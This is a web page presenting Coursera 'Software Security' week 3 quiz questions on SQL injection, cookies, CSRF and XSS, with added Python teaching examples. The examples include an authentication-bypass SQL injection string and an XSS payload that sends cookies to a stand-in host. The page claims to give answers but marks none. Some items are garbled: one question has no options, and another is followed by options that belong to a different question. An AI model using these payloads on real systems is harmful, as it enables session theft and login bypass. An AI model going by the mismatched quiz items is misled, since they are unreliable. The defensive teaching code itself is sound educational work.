Software Security Week 3 Quiz Answer
In this article I am going to share the answers to the Coursera course Software Security Week 3 quiz with you.
Week 3 Quiz Answers
What is one difference between an HTTP GET and an HTTP POST request?
- Only GET requests use the REFERER header
- Only GET requests are subject to the same-origin policy
- Only POST requests can encode parameters in the URL
- Only POST requests may include parameter data in the request body
Which of the following is true about static and dynamic web content?
- Static content may be re-generated with each request
- Static pages may include PHP programs, which execute at the browser
- The server often produces dynamic content based on the contents of the database
SQL injection exploits a bug in what interaction of a web application?
- Client to server
- Network to server
- Server to client
- Server to database
SQL injection often allows an attacker to do which of the following?
- Access information he shouldn’t
- Overrun a buffer to smash the stack
- Cause memory to be used after it’s freed
- All of the above
If you had to summarize the key (most specific) programming failure with SQL injection, it would be:
- Confusing data with code
- Bypassing authentication
- Trusting without verifying
- Circumventing the same origin policy
What is escaping an example of?
Suppose a web application implements authentication by constructing an SQL query from HTML form data using PHP’s prepared statements. What would happen if an attacker entered FRANK' OR 1=1; -- in the web form’s user field?
- The application will try to authenticate a user whose name is FRANK' OR 1=1; --
- The text will modify the structure of the SQL query and possibly bypass authentication
- The text will be confused as the password and authentication will probably fail
- The text will corrupt the query structure and the database will view it as a syntax error
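The following is an added example, not part of the quiz or the course, showing three ways the login query in the question above could be built and what the payload does to each, run against SQLite through Python's sqlite3 module. The `users` table, its two rows and the column names are assumptions constructed for the example; the payload is the one from the question with a plain `--` comment marker. It also covers the escaping question above: doubling quotes is the escaping that keeps the input inside the string literal.

```python
import sqlite3

# Constructed sample data for this example (assumed table and users, not from the page).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "correct-horse"), ("frank", "battery-staple")])
    conn.commit()
    return conn

def login_concat(conn, username, password):
    # String concatenation: the quote inside `username` closes the literal and the
    # rest of the input is parsed as SQL. "OR 1=1" makes the WHERE clause always
    # true and "--" comments out the password check (data is confused with code).
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return [row[0] for row in conn.execute(query)]

def sql_quote(text):
    # Escaping: a single quote inside a SQL string literal is written as two quotes.
    return text.replace("'", "''")

def login_escaped(conn, username, password):
    # Escaping keeps the whole input inside the literal; the query structure
    # is unchanged, so the database looks for a user literally named
    # "FRANK' OR 1=1; --" and finds nothing.
    query = (f"SELECT username FROM users WHERE username = '{sql_quote(username)}' "
             f"AND password = '{sql_quote(password)}'")
    return [row[0] for row in conn.execute(query)]

def login_prepared(conn, username, password):
    # Prepared statement: the structure is compiled before any data is bound,
    # so the input can only ever be compared as a value, never parsed as SQL.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (username, password))]

PAYLOAD = "FRANK' OR 1=1; --"

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", login_concat(db, PAYLOAD, "wrong"))   # every user
    print("escaped:     ", login_escaped(db, PAYLOAD, "wrong"))  # nobody
    print("prepared:    ", login_prepared(db, PAYLOAD, "wrong")) # nobody
```

The concatenated version returns every row because the query became `... WHERE username = 'FRANK' OR 1=1; --' AND password = 'wrong'`; with escaping or a placeholder the same text is just a username that does not exist. Escaping is correct only if it is applied to every value and matches the database's quoting rules, which is why the prepared statement is the preferred fix.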
Why is it undesirable to implement session identifiers using (only) hidden form fields?
- Such fields cannot contain binary data
- These fields are easily modified by the user
- Such fields cannot include timeout information
- The session ID is forgotten when the browser window is closed
Suppose a browser submits a GET request to URL http://www.mybank.com/accountinfo on 20 February 2015. Which of the following cookies, if already stored at the browser, would be sent with the request?
- edition=us; expires=Wed, 18-Feb-2015; path=/; domain=.mybank.com
- sessid=ABCDEFG; expires=Sat, 21-Feb-2015; path=/; domain=.mybank.com
- lang=us-english; expires=Sat, 1-Aug-2015; path=/accountinfo/; domain=.fidelity.com
- edition=us; expires=Thu, 19-Feb-2015; path=/accountinfo/prefs; domain=.mybank.com
Which of the following are ways that session cookies could be stolen or forged?
- Stealing it from the password database
- Reading a cookie from an unencrypted web request
- Predicting the cookie’s structure and reconstructing it
- Copying them by keylogging
Which of the following are ways to reduce the impact of a stolen cookie?
- Associate the cookie with the client’s IP address
- Giving each cookie a timeout
- Changing a user’s cookie from session to session
- Prevent cookies from entering the DNS cache
- Stealing cookies from the password database
- Associate the cookie with the server’s IP address
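The following is an added example, not from the quiz or the course, of a server-side session table that applies the mitigations named in the last two questions: an unpredictable identifier (so the cookie's structure cannot be reconstructed), a timeout, binding to the client's IP address, and issuing a fresh identifier from session to session. The class, its method names and the sample addresses and timestamps are assumptions made for the example.

```python
import secrets

class SessionStore:
    """Server-side session table (example design, not the course's code)."""

    def __init__(self, ttl_seconds=900):
        self.ttl = ttl_seconds
        self._sessions = {}  # sid -> {"user", "ip", "expires"}

    def create(self, user, client_ip, now):
        # Unpredictable identifier: 32 random bytes from the OS CSPRNG. A counter,
        # a timestamp or a hash of the username could be predicted and forged.
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": user, "ip": client_ip, "expires": now + self.ttl}
        return sid

    def validate(self, sid, client_ip, now):
        # Returns the user for a live session, or None. `now` is a timestamp
        # in seconds so the example runs without touching the clock.
        s = self._sessions.get(sid)
        if s is None:
            return None
        if now >= s["expires"]:
            del self._sessions[sid]  # timeout: a stolen cookie dies with the session
            return None
        if s["ip"] != client_ip:
            return None  # bound to the client address: a replay from elsewhere fails
        return s["user"]

    def rotate(self, sid, client_ip, now):
        # New identifier per session (at login, or after a privilege change) and the
        # old one retired, so a cookie captured earlier is worthless afterwards.
        user = self.validate(sid, client_ip, now)
        if user is None:
            return None
        del self._sessions[sid]
        return self.create(user, client_ip, now)

    def logout(self, sid):
        self._sessions.pop(sid, None)

if __name__ == "__main__":
    store = SessionStore(ttl_seconds=60)
    sid = store.create("alice", "203.0.113.5", now=1000)   # constructed sample values
    print(store.validate(sid, "203.0.113.5", now=1010))     # alice
    print(store.validate(sid, "198.51.100.9", now=1010))    # None: replayed from another IP
    print(store.validate(sid, "203.0.113.5", now=1061))     # None: timed out
```

IP binding is a trade-off rather than a free win: users behind carrier NAT or switching between Wi-Fi and mobile networks change address mid-session and get logged out, so many sites bind to less volatile signals or accept the weaker protection. The timeout and rotation are cheap and should always be present.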
How can the REFERER field be used to defend against CSRF attacks?
- It ensures that requests only come from authenticated users
- It can’t be used reliably because it only works for dynamic content
- It can be used to ensure that sensitive requests are (only) initiated by interaction with a site’s own pages
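As an added example, not part of the quiz or the course, here is the Referer check the correct answer describes, written as a Python function a server would call before handling a sensitive request. It compares the full origin (scheme, host and port) of the Referer against the site's own origin rather than testing a string prefix, and it fails closed when the header is absent, since browsers and proxies sometimes strip it. The header dictionary, the function name and the sample origins are assumptions made for the example.

```python
from urllib.parse import urlsplit

def _default_port(scheme):
    return {"http": 80, "https": 443}.get(scheme)

def origin_of(url):
    # (scheme, host, port) of a URL; the port is filled in from the scheme when
    # it is not written explicitly, so "https://site" and "https://site:443" agree.
    u = urlsplit(url)
    scheme = u.scheme.lower()
    return (scheme, (u.hostname or "").lower(), u.port or _default_port(scheme))

def referer_allows(headers, site_origin, require_referer=True):
    """Allow a state-changing request only if its Referer is one of our own pages.

    `headers` is a dict of request headers (example shape); `site_origin` is the
    site's own origin such as "https://www.mybank.com". Comparing whole origins
    rejects look-alikes such as "https://www.mybank.com.evil.test/" and
    "https://evil.test/www.mybank.com", which a prefix or substring test would accept.
    """
    referer = headers.get("Referer")
    if not referer:
        # Missing Referer: failing open would let every header-stripped request
        # through, so the default is to refuse and let the caller decide otherwise.
        return not require_referer
    return origin_of(referer) == origin_of(site_origin)

if __name__ == "__main__":
    SITE = "https://www.mybank.com"   # constructed sample origin
    print(referer_allows({"Referer": "https://www.mybank.com/transfer"}, SITE))  # True
    print(referer_allows({"Referer": "https://evil.test/www.mybank.com"}, SITE)) # False
    print(referer_allows({}, SITE))                                             # False
```

This check is only as strong as the header: an attacker who can already inject content into one of the site's own pages (XSS) will produce requests with a valid Referer, and users whose browsers suppress the header are blocked unless `require_referer` is relaxed. Modern browsers also send an `Origin` header on cross-site POSTs, which can be checked the same way, and an anti-CSRF token in the form is the more robust defence.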
<script></script> tags in HTML pages most often identify programs written in what language?
- Such programs could deny service by running forever
- Such programs may access browser-controlled resources, which include potentially sensitive data in HTML documents and cookies
- It doesn’t — these programs are only used to render dynamic content but are otherwise not security-relevant
XSS subverts what policy?
- Same Origin
- Secure defaults
What is the difference between stored (or persistent) XSS and reflected XSS?
- Stored XSS is amenable to blacklisting but reflected XSS is not
- Stored XSS works by injecting code in a site’s served content, while reflected XSS injects code in a URL
- Stored XSS works on database queries while reflected XSS works on cookies, which are received from and reflected back to the server
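As an added example, not part of the quiz or the course, the following Python code shows the two delivery paths in the last question side by side: a reflected payload that travels inside a URL and is echoed into the response, and a stored payload that was saved earlier (a comment, for instance) and is served to every later visitor. Both are stopped the same way, by escaping at the point where data is placed into HTML. The page layout, the `q` parameter, the host name and the payload are assumptions constructed for the example; the payload is a marker string and is never executed here.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed payload for the example: an injected script that would ship the
# victim's cookies to an attacker-controlled host (a marker string only).
PAYLOAD = "<script>document.location='http://evil.test/?c='+document.cookie</script>"

def crafted_url(payload):
    # Reflected XSS: the attacker builds a link carrying the payload in a query
    # parameter and has the victim click it.
    return "http://www.example.test/search?q=" + quote(payload)

def query_from_url(url):
    # The server side of that link: the search term as read from the URL.
    return parse_qs(urlsplit(url).query).get("q", [""])[0]

def reflected_page_unsafe(query):
    # The term is echoed straight into the response, so the browser sees markup.
    return f"<h1>Results for {query}</h1>"

def stored_page_unsafe(comments):
    # Stored XSS: the payload was saved as a comment and is served in the page
    # itself, with no special URL; every visitor who loads the page runs it.
    return "<ul>" + "".join(f"<li>{c}</li>" for c in comments) + "</ul>"

def render_safe(template, values):
    # Output encoding: escape each value as it is placed into HTML, so "<" becomes
    # "&lt;" and the text stays data rather than becoming code.
    return template.format(*(html.escape(v, quote=True) for v in values))

def contains_script(page):
    return "<script" in page.lower()

if __name__ == "__main__":
    term = query_from_url(crafted_url(PAYLOAD))
    print(contains_script(reflected_page_unsafe(term)))                       # True
    print(contains_script(render_safe("<h1>Results for {}</h1>", [term])))    # False
    comments = ["nice post", PAYLOAD]                                          # constructed
    print(contains_script(stored_page_unsafe(comments)))                       # True
    print(contains_script(render_safe("<ul><li>{}</li><li>{}</li></ul>", comments)))  # False
```

The escaping in `render_safe` is specific to HTML element content and attribute values; data placed into a JavaScript string, a URL or a CSS rule needs the encoding of that context instead, and a blacklist of tag names is not a substitute for either form.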